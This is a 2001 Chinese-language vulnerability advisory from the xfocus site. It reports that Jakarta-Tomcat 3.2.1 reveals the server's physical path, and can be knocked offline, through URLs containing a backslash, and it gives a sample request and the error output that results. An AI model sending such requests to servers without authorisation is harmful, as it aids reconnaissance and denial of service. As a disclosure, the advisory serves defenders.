xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Jakarta-Tomcat v3.2.1 存在目录泄露和拒绝服务攻击


发布时间:2001-08-18
更新时间:2001-08-18
严重程度:
威胁程度:服务器信息泄露
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
Jakarta-Tomcat v3.2.1
详细描述
Tomcat v3.2.1 存在目录泄露问题,通过请求带'\'的URL请求,
可以泄露服务器的物理路径:

http://host/\index.jsp


Error: 500
Location: /index.jsp
Internal Servlet Error:


org.apache.jasper.JasperException: Unable to compile class for JSP
C:\tomcat\jakarta-tomcat-3.2.1\work\localhost_8080\_0002findex_0002ejspindex_jsp_69.java:482:
Method autenticate(java.lang.String) not found in class ENTERPRISE.login.
                if(pubBean.autenticate(password) != 0)
                                           ^
C:\tomcat\jakarta-tomcat-3.2.1\work\localhost_8080\_0002findex_0002ejspindex_jsp_69.java:664:
Method
Others methods...


而且类似上面的多种请求可以导致拒绝服务攻击。

测试代码
见描述部分。

解决方案
尚无

相关信息
Efrain 'ET' Torres
[LoWNOISE] Colombia
et@cyberspace.org